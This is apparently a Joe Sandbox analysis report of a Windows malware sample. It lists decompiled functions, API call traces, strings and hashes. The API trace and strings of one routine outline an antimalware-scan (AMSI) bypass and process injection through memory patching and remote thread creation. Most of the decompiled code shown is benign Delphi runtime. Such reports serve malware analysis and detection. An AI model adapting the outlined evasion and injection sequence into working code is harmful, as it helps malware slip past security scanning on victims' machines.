0x02868d82
0x02868d89
0x02868d9c
0x02868da2
0x02868dae
0x02868db2
0x02868df3
0x02868df3
0x02868df8
0x02868dfa
0x02868e0a
0x02868e22
0x02868e2d
0x02868e3b
0x02868e53
0x02868e5e
0x02868e5f
0x02868e67
0x02868e6f
0x02868e7b
0x02868e89
0x02868e96
0x02868e96
0x02868e9b
0x02868ea0
0x02868ea2
0x02868eb2
0x02868eca
0x02868ed5
0x02868ee3
0x02868efb
0x02868f06
0x02868f07
0x02868f0c
0x02868f11
0x02868f13
0x02868f23
0x02868f3b
0x02868f46
0x02868f54
0x02868f6c
0x02868f77
0x02868f78
0x02868f7d
0x02868f82
0x02868f84
0x02868f94
0x02868fac
0x02868fb7
0x02868fc5
0x02868fdd
0x02868fe8
0x02868fe9
0x02868ffe
0x02869004
0x02869009
0x0286900e
0x02869010
0x02869020
0x02869038
0x02869043
0x02869051
0x02869069
0x02869074
0x02869075
0x0286907a
0x0286907f
0x02869081
0x02869091
0x028690a9
0x028690b4
0x028690c2
0x028690da
0x028690e5
0x028690e6
0x028690eb
0x028690f0
0x028690f2
0x02869102
0x0286911a
0x02869125
0x02869133
0x0286914b
0x02869156
0x02869157
0x02869168
0x0286916d
0x02869172
0x02869174
0x02869184
0x0286919c
0x028691a7
0x028691b5
0x028691cd
0x028691d8
0x028691d9
0x028691de
0x028691e3
0x028691e5
0x028691f5
0x0286920d
0x02869218
0x02869226
0x0286923e
0x02869249
0x0286924a
0x0286924f
0x02869254
0x02869256
0x02869266
0x0286927e
0x02869289
0x02869297
0x028692af
0x028692ba
0x028692bb
0x028692d0
0x028692d5
0x028692db
0x028692dd
0x028692e2
0x028692e4
0x028692f4
0x0286930c
0x02869317
0x02869325
0x0286933d
0x02869348
0x02869349
0x0286934e
0x02869353
0x02869355
0x02869365
0x0286937d
0x02869388
0x02869396
0x028693ae
0x028693b9
0x028693ba
0x028693bf
0x028693c4
0x028693c6
0x028693d6
0x028693ee
0x028693f9
0x02869407
0x0286941f
0x0286942a
0x0286942b
0x02869430
0x02869436
0x0286943c
0x02869442
0x02869448
0x0286944e
0x02869455
0x02869457
0x0286945c
0x0286945e
0x0286946e
0x02869486
0x02869491
0x0286949f
0x028694b7
0x028694c2
0x028694c3
0x028694d8
0x028694dd
0x028694e3
0x028694e7
0x028694ee
0x028694f3
0x028694f8
0x028694fa
0x0286950a
0x02869522
0x0286952d
0x0286953b
0x02869553
0x0286955e
0x0286955f
0x02869564
0x02869569
0x0286956b
0x0286957b
0x02869593
0x0286959e
0x028695ac
0x028695c4
0x028695cf
0x028695d0
0x028695d5
0x028695da
0x028695dc
0x028695ec
0x02869604
0x0286960f
0x0286961d
0x02869635
0x02869640
0x02869641
0x02869646
0x0286964b
0x0286964d
0x0286965d
0x02869675
0x02869680
0x0286968e
0x028696a6
0x028696b1
0x028696b2
0x028696b7
0x028696c4
0x028696d4
0x028696da
0x028696e1
0x028696ed
0x028696f2
0x02869701
0x02869706
0x02869715
0x0286971a
0x0286971f
0x02869724
0x02869726
0x02869736
0x0286974e
0x02869759
0x02869767
0x0286977f
0x0286978a
0x0286978b
0x02869797
0x0286979d
0x028697a1
0x028697a7
0x028697a7
0x00000000
0x02869797
0x02868db4
0x02868db5
0x02868db5
0x02868dbe
0x02868dcd
0x02868ddc
0x02868de1
0x02868de9
0x02868dee
0x02868dee
0x00000000
0x02868db5
0x02868a3e

APIs

Part of subcall function 02867B80: LoadLibraryExA.KERNEL32(00000000,00000000,00000000,00000000,02867C5B), ref: 02867BB8
Part of subcall function 02867B80: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BC6
Part of subcall function 02867B80: GetProcAddress.KERNEL32(6CFE0000,00000000), ref: 02867BDF
Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867BFA
Part of subcall function 02867B80: VirtualProtectEx.KERNEL32(00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000,02867C5B), ref: 02867C00
Part of subcall function 02867B80: GetCurrentProcess.KERNEL32(028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 02867C2A
Part of subcall function 02867B80: NtWriteVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000,00000000), ref: 02867C30
Part of subcall function 02867B80: FreeLibrary.KERNEL32(6CFE0000,00000000,028A6348,02856738,00000004,028A634C,00000000,028A6348,00000190,00000040,028A634C,6CFE0000,00000000,00000000,00000000,00000000), ref: 02867C3B

GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,ScanString,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,Initialize,028A63CC), ref: 028685FF
GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtOpenProcess,ScanBuffer,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,ScanString,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,Initialize), ref: 02868605
GetCurrentProcess.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 02868871

Part of subcall function 028679CC: GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679D9
Part of subcall function 028679CC: GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtAllocateVirtualMemory), ref: 028679DF
Part of subcall function 028679CC: NtAllocateVirtualMemory.NTDLL(?,?,00000000,?,?,?), ref: 028679FF

IsBadReadPtr.KERNEL32(00000000,00000040,?,?,00000000,00000000), ref: 02868A0A
IsBadReadPtr.KERNEL32(?,000000F8,00000000,00000040,?,?,00000000,00000000), ref: 02868A37
GetCurrentProcess.KERNEL32(00000000,00000000,00003000,00000040,?,000000F8,00000000,00000040,?,?,00000000,00000000), ref: 02868A87
RtlMoveMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,OpenSession,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,ScanBuffer,028A63CC,028699BC,OpenSession,028A63CC,028699BC,UacInitialize), ref: 02868DA2
RtlMoveMemory.C:\WINDOWS\SYSTEM32\NTDLL(?,?,?,00000000,00000000,00000000,OpenSession,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,ScanBuffer,028A63CC,028699BC,OpenSession), ref: 02868DDC
GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,028A63CC,028699BC,ScanBuffer,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,OpenSession,028A63CC,028699BC,UacInitialize,028A63CC), ref: 028692CA
GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,NtWriteVirtualMemory,ScanString,028A63CC,028699BC,ScanBuffer,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,OpenSession,028A63CC,028699BC,UacInitialize), ref: 028692D0
GetModuleHandleW.KERNEL32(C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanBuffer,028A63CC,028699BC,?,?,00000000,00000000), ref: 028694D2
GetProcAddress.C:\WINDOWS\SYSTEM32\KERNELBASE(00000000,C:\Windows\System32\ntdll.dll,RtlCreateUserThread,ScanBuffer,028A63CC,028699BC,?,?,00000000,00000000), ref: 028694D8

Part of subcall function 02867B24: LoadLibraryA.KERNEL32(ntdll), ref: 02867B36
Part of subcall function 02867B24: GetProcAddress.KERNEL32(00000000,NtOpenProcess), ref: 02867B43
Part of subcall function 02867B24: WriteProcessMemory.KERNEL32(00000000,00000000,?,00000001,?,00000000,NtOpenProcess,ntdll), ref: 02867B5C
Part of subcall function 02867B24: FreeLibrary.KERNEL32(00000000,00000000,NtOpenProcess,ntdll), ref: 02867B6F

CloseHandle.KERNEL32(00000000,ScanBuffer,028A63CC,028699BC,?,?,00000000,00000000), ref: 028697A7
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,OpenSession,028A63CC,028699BC,ScanString,028A63CC,028699BC,UacInitialize,028A63CC,028699BC,OpenSession,028A63CC,028699BC), ref: 0286991B
GetCurrentProcess.KERNEL32(00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000000,00000000), ref: 02869931
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,00004000,?,000000F8,00000000,00000040,?,?,00000000,00000000), ref: 02869937
GetCurrentProcess.KERNEL32(00000000,00000000,?,?,00000000,00000000), ref: 0286994E
NtFreeVirtualMemory.C:\WINDOWS\SYSTEM32\NTDLL(00000000,00000000,00000000,?,?,00000000,00000000), ref: 02869954
CloseHandle.KERNEL32(00000000,ScanString,028A63CC,028699BC,Initialize,028A63CC,028699BC,OpenSession,028A63CC,028699BC,ScanString,028A63CC,028699BC,Initialize,028A63CC,028699BC), ref: 0286995F

Strings

NtOpenProcess, xrefs: 028685F5, 028696E3
ntdll, xrefs: 028696E8, 028696FC, 02869710
Initialize, xrefs: 02868415, 02868632, 02868779
UacScan, xrefs: 02868DFA
UacInitialize, xrefs: 02868472, 02868524, 028688F9, 02868B0F, 02868C8E, 02868F13, 02869081, 02869174, 028692E4, 028694FA, 0286964D, 028697B8
C:\Windows\System32\ntdll.dll, xrefs: 028685FA, 028692C5, 028694CD
ScanString, xrefs: 028683BC, 028684CB, 02868697, 028687EA, 02869256, 0286956B, 02869829
OpenSession, xrefs: 02868363, 02868708, 0286896A, 02868B80, 02868CFF, 02868F84, 028690F2, 02869355, 028695DC, 0286989A
NtReadVirtualMemory, xrefs: 028696F7
NtSetSecurityObject, xrefs: 0286970B
NtWriteVirtualMemory, xrefs: 028692C0
ScanBuffer, xrefs: 0286857D, 02868888, 02868A9E, 02868C1D, 02868EA2, 02869010, 028691E5, 028693C6, 0286945E, 02869726
RtlCreateUserThread, xrefs: 028694C8

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: Memory$HandleProcess$AddressCurrentProcVirtual$FreeModule$Library$CloseLoadMoveReadWrite$AllocateProtect
String ID: C:\Windows\System32\ntdll.dll$Initialize$NtOpenProcess$NtReadVirtualMemory$NtSetSecurityObject$NtWriteVirtualMemory$OpenSession$RtlCreateUserThread$ScanBuffer$ScanString$UacInitialize$UacScan$ntdll
API String ID: 1580181482-772507044
Opcode ID: 49283f6f5bb153f9ecb816b415f36f7ef6c570b1ea523ef3e28c5e2b83d8c818
Instruction ID: 774852005e44bb940c0fd1d92d9f94d885c183360bbfbdaebb4364035eff7268
Opcode Fuzzy Hash: 49283f6f5bb153f9ecb816b415f36f7ef6c570b1ea523ef3e28c5e2b83d8c818
Instruction Fuzzy Hash: 9DC21C3CA001689BEF10EB68D885BEE73F7AF45701F5081A1E505EB354EA74AE85CF52

Uniqueness

Uniqueness Score: -1.00%

Function 028558CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139
stringlibraryfileCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E028558CC(CHAR* __eax, int __edx) {
				CHAR* _v8;
				int _v12;
				CHAR* _v16;
				void* _v20;
				struct _WIN32_FIND_DATAA _v338;
				char _v599;
				void* _t102;
				intOrPtr* _t103;
				CHAR* _t106;
				CHAR* _t108;
				char* _t109;
				void* _t110;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_v20 = GetModuleHandleA("kernel32.dll");
				if(_v20 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t108 =  &(_v8[2]);
						goto L10;
					} else {
						if(_v8[1] == 0x5c) {
							_t109 = E028558AC( &(_v8[2]));
							if( *_t109 != 0) {
								_t17 = _t109 + 1; // 0x1
								_t108 = E028558AC(_t17);
								if( *_t108 != 0) {
									L10:
									_t102 = _t108 - _v8;
									lstrcpynA( &_v599, _v8, _t102 + 1);
									while( *_t108 != 0) {
										_t106 = E028558AC( &(_t108[1]));
										if(_t106 - _t108 + _t102 + 1 <= 0x105) {
											lstrcpynA( &(( &_v599)[_t102]), _t108, _t106 - _t108 + 1);
											_v20 = FindFirstFileA( &_v599,  &_v338);
											if(_v20 != 0xffffffff) {
												FindClose(_v20);
												if(lstrlenA( &(_v338.cFileName)) + _t102 + 1 + 1 <= 0x105) {
													 *((char*)(_t110 + _t102 - 0x253)) = 0x5c;
													lstrcpynA( &(( &(( &_v599)[_t102]))[1]),  &(_v338.cFileName), 0x105 - _t102 - 1);
													_t102 = _t102 + lstrlenA( &(_v338.cFileName)) + 1;
													_t108 = _t106;
													continue;
												}
											}
										}
										goto L17;
									}
									lstrcpynA(_v8,  &_v599, _v12);
								}
							}
						}
					}
				} else {
					_t103 = GetProcAddress(_v20, "GetLongPathNameA");
					if(_t103 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v599);
						_push(_v8);
						if( *_t103() == 0) {
							goto L4;
						} else {
							lstrcpynA(_v8,  &_v599, _v12);
						}
					}
				}
				L17:
				return _v16;
			}

0x028558d8
0x028558db
0x028558e1
0x028558ee
0x028558f5
0x0285593a
0x02855940
0x0285597d
0x00000000
0x02855942
0x02855949
0x0285595a
0x0285595f
0x02855965
0x0285596d
0x02855972
0x02855980
0x02855982
0x02855994
0x02855a45
0x028559a6
0x028559b4
0x028559ca
0x028559e2
0x028559e9
0x028559ef
0x02855a0b
0x02855a0d
0x02855a2f
0x02855a41
0x02855a43
0x00000000
0x02855a43
0x02855a0b
0x028559e9
0x00000000
0x028559b4
0x02855a5d
0x02855a5d
0x02855972
0x0285595f
0x02855949
0x028558f7
0x02855905
0x02855909
0x00000000
0x0285590b
0x0285590b
0x02855916
0x0285591a
0x0285591f
0x00000000
0x02855921
0x02855930
0x02855930
0x0285591f
0x02855909
0x02855a62
0x02855a6b

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,02856BF8,02850000,02877790), ref: 028558E9
GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 02855900
lstrcpynA.KERNEL32(?,?,?), ref: 02855930
lstrcpynA.KERNEL32(?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 02855994
lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 028559CA
FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 028559DD
FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 028559EF
lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000,02877790), ref: 028559FB
lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8,02850000), ref: 02855A2F
lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,02856BF8), ref: 02855A3B
lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 02855A5D

Strings

\, xrefs: 02855A0D
kernel32.dll, xrefs: 028558E4
GetLongPathNameA, xrefs: 028558F7

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
String ID: GetLongPathNameA$\$kernel32.dll
API String ID: 3245196872-1565342463
Opcode ID: e5f99ec7f4a350e505283ac55ad621177557b3697b84d7a25cc0e1b7136184c6
Instruction ID: a2941bb751e62fbd720afd3cb41bab40b695b4033e63a9014a870c03eb7a219b
Opcode Fuzzy Hash: e5f99ec7f4a350e505283ac55ad621177557b3697b84d7a25cc0e1b7136184c6
Instruction Fuzzy Hash: 5B41807ED00228AFDB11DAE8CC88BDEB7BDAF08354F4845A5A949D7240E7389B448F51

Uniqueness

Uniqueness Score: -1.00%

Function 02855B9C Relevance: 15.1, APIs: 10, Instructions: 98
stringlibrarythreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02855B9C() {
				void* _t32;
				CHAR* _t56;
				CHAR* _t57;
				struct HINSTANCE__* _t64;
				void* _t66;

				lstrcpynA(_t66 - 0x11d,  *(_t66 - 4), 0x105);
				GetLocaleInfoA(GetThreadLocale(), 3, _t66 - 0xd, 5);
				_t64 = 0;
				if( *(_t66 - 0x11d) == 0 ||  *(_t66 - 0xd) == 0 &&  *(_t66 - 0x12) == 0) {
					L14:
					return _t64;
				} else {
					_t56 =  &((_t66 - 0x11d)[lstrlenA(_t66 - 0x11d)]);
					L5:
					if( *_t56 != 0x2e && _t56 != _t66 - 0x11d) {
						_t56 = _t56 - 1;
						goto L5;
					}
					_t32 = _t66 - 0x11d;
					if(_t56 != _t32) {
						_t57 =  &(_t56[1]);
						if( *(_t66 - 0x12) != 0) {
							lstrcpynA(_t57, _t66 - 0x12, 0x105 - _t57 - _t32);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
						}
						if(_t64 == 0 &&  *(_t66 - 0xd) != 0) {
							lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
							_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							if(_t64 == 0) {
								 *((char*)(_t66 - 0xb)) = 0;
								lstrcpynA(_t57, _t66 - 0xd, 0x105 - _t57 - _t66 - 0x11d);
								_t64 = LoadLibraryExA(_t66 - 0x11d, 0, 2);
							}
						}
					}
					goto L14;
				}
			}

0x02855bac
0x02855bbf
0x02855bc4
0x02855bcd
0x02855cb6
0x02855cbd
0x02855be3
0x02855bf7
0x02855bfc
0x02855bff
0x02855bfb
0x00000000
0x02855bfb
0x02855c0b
0x02855c13
0x02855c19
0x02855c1e
0x02855c31
0x02855c46
0x02855c46
0x02855c4a
0x02855c69
0x02855c7e
0x02855c82
0x02855c84
0x02855c9f
0x02855cb4
0x02855cb4
0x02855c82
0x02855c4a
0x00000000
0x02855c13

APIs

lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 02855BAC
GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 02855BB9
GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 02855BBF
lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 02855BEA
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C31
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C41
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 02855C69
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 02855C79
lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 02855C9F
LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 02855CAF

Strings

Software\Borland\Delphi\Locales, xrefs: 02855AFC
Software\Borland\Locales, xrefs: 02855AC0, 02855ADE

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
API String ID: 1599918012-2375825460
Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
Instruction ID: 9cc0bd4f92caf1d1a21c259adafbcb172a45b5ebf1f24c25a93a05a087384f50
Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
Instruction Fuzzy Hash: 8B3187BDE4013C6AFB25D6B8DC49FDE77AD4B04384F8401E19A48E6181EB789F848F52

Uniqueness

Uniqueness Score: -1.00%

Function 02881D2A Relevance: 5.1, Strings: 2, Instructions: 2575COMMON

Download Yara Rule

Strings

c, xrefs: 02883C15
, xrefs: 0288414E

Memory Dump Source

Source File: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID:
String ID: $c
API String ID: 0-3797896886
Opcode ID: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
Instruction ID: 4eb901d307a1bcefe150c5f3661a6dfd4a00b885d09085293c89feaf717c02c5
Opcode Fuzzy Hash: 7e70446f2f04736b70a214ab031c3aa6bebdc213c1cd19f391bef6f9c6eef634
Instruction Fuzzy Hash: 1923F17DA00206AFDB31EF68CD84FBE77B2AF45704F188558E509E6281DB749981CF26

Uniqueness

Uniqueness Score: -1.00%

Function 02857FB8 Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E02857FB8(CHAR* _a4, intOrPtr* _a8, intOrPtr* _a12) {
				long _v8;
				long _v12;
				long _v16;
				long _v20;
				intOrPtr _v24;
				signed int _v28;
				CHAR* _t25;
				int _t26;
				intOrPtr _t31;
				intOrPtr _t34;
				intOrPtr* _t37;
				intOrPtr* _t38;
				intOrPtr _t46;
				intOrPtr _t48;

				_t25 = _a4;
				if(_t25 == 0) {
					_t25 = 0;
				}
				_t26 = GetDiskFreeSpaceA(_t25,  &_v8,  &_v12,  &_v16,  &_v20);
				_v28 = _v8 * _v12;
				_v24 = 0;
				_t46 = _v24;
				_t31 = E0285539C(_v28, _t46, _v16, 0);
				_t37 = _a8;
				 *_t37 = _t31;
				 *((intOrPtr*)(_t37 + 4)) = _t46;
				_t48 = _v24;
				_t34 = E0285539C(_v28, _t48, _v20, 0);
				_t38 = _a12;
				 *_t38 = _t34;
				 *((intOrPtr*)(_t38 + 4)) = _t48;
				return _t26;
			}

0x02857fbf
0x02857fc4
0x02857fc6
0x02857fc6
0x02857fd9
0x02857fe8
0x02857feb
0x02857ff8
0x02857ffb
0x02858000
0x02858003
0x02858005
0x02858012
0x02858015
0x0285801a
0x0285801d
0x0285801f
0x02858028

APIs

GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 02857FD9

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: DiskFreeSpace
String ID:
API String ID: 1705453755-0
Opcode ID: d558045882f34555589acd1f43931dcce1d214f025d2185a02bd3273f9f057ba
Instruction ID: 7e984dc68e14ae03a3ea730d280a03b3cb9f1e6aaa304536754b6fa9d8a0d3eb
Opcode Fuzzy Hash: d558045882f34555589acd1f43931dcce1d214f025d2185a02bd3273f9f057ba
Instruction Fuzzy Hash: 4C11D2B5E00209AFDB44CF99C881DEFF7FAEFC8300B54C559A909E7254E6719A018B91

Uniqueness

Uniqueness Score: -1.00%

Function 0285A7A8 Relevance: 1.5, APIs: 1, Instructions: 29
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0285A7A8(int __eax, void* __ecx, int __edx, intOrPtr _a4) {
				char _v260;
				int _t5;
				intOrPtr _t10;
				void* _t18;

				_t18 = __ecx;
				_t10 = _a4;
				_t5 = GetLocaleInfoA(__eax, __edx,  &_v260, 0x100);
				_t19 = _t5;
				if(_t5 <= 0) {
					return E028544F4(_t10, _t18);
				}
				return E02854590(_t10, _t5 - 1,  &_v260, _t19);
			}

0x0285a7b3
0x0285a7b5
0x0285a7c6
0x0285a7cb
0x0285a7cd
0x00000000
0x0285a7e5
0x00000000

APIs

GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 0285A7C6

Memory Dump Source

Source File: 00000000.00000002.554764034.0000000002851000.00000020.00001000.00020000.00000000.sdmp, Offset: 02850000, based on PE: true

Associated: 00000000.00000002.554751318.0000000002850000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554840460.0000000002877000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554933392.00000000028A6000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.554948392.00000000028A7000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2850000_tTIYCp2sf4.jbxd

Similarity

API ID: InfoLocale
String ID:
API String ID: 2299586839-0
Opcode ID: 6a7be2a49ff6658f09632d279ecb7de677017f0ff0439b49a4787070f8f3a681
Instruction ID: 0c7d80de5e4b6420817a390adf120a5239a16e0ec3a8f2819450b664fe3d3d30
Opcode Fuzzy Hash: 6a7be2a49ff6658f09632d279ecb7de677017f0ff0439b49a4787070f8f3a681
Instruction Fuzzy Hash: 37E0D83D70023817D314A96C5C919F6739DD75C310F00427EBD49C7341EDA09D808AE5

Uniqueness

Uniqueness Score: -1.00%

Function 0285B770 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0285B770() {
				char _v128;
				intOrPtr _v132;
				signed int _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				int _t7;
				struct _OSVERSIONINFOA* _t18;

				_t18->dwOSVersionInfoSize = 0x94;
				_t7 = GetVersionExA(_t18);
				if(_t7 != 0) {
					 *0x28777c0 = _v132;
					 *0x28777c4 = _v144;
					 *0x28777c8 = _v140;
					if( *0x28777c0 != 1) {
						 *0x28777cc = _v136;
					} else {
						 *0x28777cc = _v136 & 0x0000ffff;
					}
					return E02854710(0x28777d0, 0x80,  &_v128);
				}
				return _t7;
			}

0x0285b776
0x0285b77e
0x0285b785
0x0285b78b
0x0285b794
0x0285b79d
0x0285b7a9
0x0285b7bf
0x0285b7ab
0x0285b7b4
0x0285b7b4
0x00000000
0x0285b7d2
0x0285b7dd

APIs

GetVersionExA.KERNEL32(?,02876106,00000000,0287611E), ref: 0285B77E

Memory Dump Source

